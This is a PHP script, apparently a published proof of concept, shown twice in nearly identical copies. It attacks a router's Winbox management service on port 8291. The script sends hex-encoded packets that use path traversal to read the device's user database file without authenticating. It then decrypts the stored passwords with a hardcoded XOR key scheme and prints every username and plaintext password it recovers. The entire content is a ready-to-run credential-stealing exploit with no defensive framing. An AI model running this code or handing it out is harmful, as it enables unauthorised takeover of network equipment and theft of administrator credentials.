vibbow/ros_642.php

## ros_642.php
<?php

$payload_a  = "680100664d320500ff010600ff09050700ff090701000021352f2f2f2f2f2e2f";
$payload_a .= "2e2e2f2f2f2f2f2f2e2f2e2e2f2f2f2f2f2f2e2f2e2e2f666c6173682f72772f";
$payload_a .= "73746f72652f757365722e6461740200ff88020000000000080000000100ff88";
$payload_a .= "02000200000002000000";

$payload_b  = "3b0100394d320500ff010600ff09060100fe093502000008008000000700ff09";
$payload_b .= "040200ff88020000000000080000000100ff8802000200000002000000";

$payload_a = hex2bin($payload_a);
$payload_b = hex2bin($payload_b);

echo "Open connection" . PHP_EOL;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, '192.168.88.1', 8291);

echo "Start session" . PHP_EOL;
socket_write($socket, $payload_a, strlen($payload_a));

echo "Receive response" . PHP_EOL;
sleep(1);
$response_a = socket_read($socket, 2048);

echo "Fetch password file" . PHP_EOL;
$payload_b[19] = $response_a[38];
socket_write($socket, $payload_b, strlen($payload_b));

echo "Receive response" . PHP_EOL;
sleep(1);
$response_b = socket_read($socket, 2048);

// =======================================
echo "===========================" . PHP_EOL;

$response = substr($response_b, 55);
$response_r = explode("M2", $response);

for ($i = 3; $i < count($response_r); $i++) {
	$user_data = explode(hex2bin("01000021"), $response_r[$i]);
	$pass_data = explode(hex2bin("11000021"), $response_r[$i]);

	if ( ! isset($user_data[1]) || ! isset($pass_data[1])) {
		continue;
	}

	$user_data = $user_data[1];
	$pass_data = $pass_data[1];

	$user_len = hexdec(bin2hex($user_data[0]));
	$pass_len = hexdec(bin2hex($pass_data[0]));

	$username = substr($user_data, 1, $user_len);
	$password_enc = substr($pass_data, 1, $pass_len);

	$key = md5($username . "283i4jfkai3389");
	$key = hex2bin($key);

	$password = "";
	for ($o = 0; $o < strlen($password_enc); $o++) {
		$byte = $password_enc[$o];
		$xor = ($key[$o % strlen($key)]);
		$password .= ($byte ^ $xor);
	}

	$password = explode(hex2bin("00"), $password)[0];

	echo "Username: {$username}" . PHP_EOL;
	echo "Password: {$password}" . PHP_EOL;
}
	<?php

	$payload_a = "680100664d320500ff010600ff09050700ff090701000021352f2f2f2f2f2e2f";
	$payload_a .= "2e2e2f2f2f2f2f2f2e2f2e2e2f2f2f2f2f2f2e2f2e2e2f666c6173682f72772f";
	$payload_a .= "73746f72652f757365722e6461740200ff88020000000000080000000100ff88";
	$payload_a .= "02000200000002000000";

	$payload_b = "3b0100394d320500ff010600ff09060100fe093502000008008000000700ff09";
	$payload_b .= "040200ff88020000000000080000000100ff8802000200000002000000";

	$payload_a = hex2bin($payload_a);
	$payload_b = hex2bin($payload_b);

	echo "Open connection" . PHP_EOL;
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	socket_connect($socket, '192.168.88.1', 8291);

	echo "Start session" . PHP_EOL;
	socket_write($socket, $payload_a, strlen($payload_a));

	echo "Receive response" . PHP_EOL;
	sleep(1);
	$response_a = socket_read($socket, 2048);

	echo "Fetch password file" . PHP_EOL;
	$payload_b[19] = $response_a[38];
	socket_write($socket, $payload_b, strlen($payload_b));

	echo "Receive response" . PHP_EOL;
	sleep(1);
	$response_b = socket_read($socket, 2048);

	// =======================================
	echo "===========================" . PHP_EOL;

	$response = substr($response_b, 55);
	$response_r = explode("M2", $response);

	for ($i = 3; $i < count($response_r); $i++) {
	$user_data = explode(hex2bin("01000021"), $response_r[$i]);
	$pass_data = explode(hex2bin("11000021"), $response_r[$i]);

	if ( ! isset($user_data[1]) \|\| ! isset($pass_data[1])) {
	continue;
	}

	$user_data = $user_data[1];
	$pass_data = $pass_data[1];

	$user_len = hexdec(bin2hex($user_data[0]));
	$pass_len = hexdec(bin2hex($pass_data[0]));

	$username = substr($user_data, 1, $user_len);
	$password_enc = substr($pass_data, 1, $pass_len);

	$key = md5($username . "283i4jfkai3389");
	$key = hex2bin($key);

	$password = "";
	for ($o = 0; $o < strlen($password_enc); $o++) {
	$byte = $password_enc[$o];
	$xor = ($key[$o % strlen($key)]);
	$password .= ($byte ^ $xor);
	}

	$password = explode(hex2bin("00"), $password)[0];

	echo "Username: {$username}" . PHP_EOL;
	echo "Password: {$password}" . PHP_EOL;
	}